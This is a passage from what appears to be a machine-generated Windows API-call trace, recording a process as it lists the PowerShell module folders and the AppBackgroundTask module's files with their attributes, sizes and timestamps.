ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0198.786] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0198.786] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0198.786] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0198.786] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0198.786] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0198.787] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0198.787] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0198.787] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0198.787] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0198.788] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0198.788] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0198.788] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0198.788] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0198.788] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0198.789] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0198.789] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0198.789] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0198.789] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0198.790] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0198.790] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0198.790] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 0 [0198.790] FindClose (in: hFindFile=0x2386d70a490 | out: hFindFile=0x2386d70a490) returned 1 [0198.791] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0xafa508da00, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0198.791] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0xafa508dc30 | out: lpFindFileData=0xafa508dc30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d709590 [0198.791] FindNextFileW (in: hFindFile=0x2386d709590, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.791] FindNextFileW (in: hFindFile=0x2386d709590, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0198.791] FindNextFileW (in: hFindFile=0x2386d709590, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0198.791] FindNextFileW (in: hFindFile=0x2386d709590, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0198.792] FindNextFileW (in: hFindFile=0x2386d709590, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0198.792] FindNextFileW (in: hFindFile=0x2386d709590, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0198.792] FindClose (in: hFindFile=0x2386d709590 | out: hFindFile=0x2386d709590) returned 1 [0198.792] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0xafa508da00, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0198.793] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0xafa508dc30 | out: lpFindFileData=0xafa508dc30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d709bf0 [0198.793] FindNextFileW (in: hFindFile=0x2386d709bf0, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.793] FindNextFileW (in: hFindFile=0x2386d709bf0, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0198.793] FindNextFileW (in: hFindFile=0x2386d709bf0, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0198.793] FindNextFileW (in: hFindFile=0x2386d709bf0, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0198.793] FindNextFileW (in: hFindFile=0x2386d709bf0, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0198.793] FindNextFileW (in: hFindFile=0x2386d709bf0, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0198.793] FindClose (in: hFindFile=0x2386d709bf0 | out: hFindFile=0x2386d709bf0) returned 1 [0198.794] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0xafa508dae0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0198.794] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask"), fInfoLevelId=0x0, lpFileInformation=0xafa508e010 | out: lpFileInformation=0xafa508e010*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0198.794] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0xafa508da60, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0198.794] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0xafa508dc90 | out: lpFindFileData=0xafa508dc90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d70a6d0 [0198.794] FindNextFileW (in: hFindFile=0x2386d70a6d0, lpFindFileData=0xafa508dc50 | out: lpFindFileData=0xafa508dc50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.794] FindNextFileW (in: hFindFile=0x2386d70a6d0, lpFindFileData=0xafa508dc50 | out: lpFindFileData=0xafa508dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0198.794] FindNextFileW (in: hFindFile=0x2386d70a6d0, lpFindFileData=0xafa508dc50 | out: lpFindFileData=0xafa508dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0198.795] FindNextFileW (in: hFindFile=0x2386d70a6d0, lpFindFileData=0xafa508dc50 | out: lpFindFileData=0xafa508dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0198.795] FindNextFileW (in: hFindFile=0x2386d70a6d0, lpFindFileData=0xafa508dc50 | out: lpFindFileData=0xafa508dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0198.795] FindNextFileW (in: hFindFile=0x2386d70a6d0, 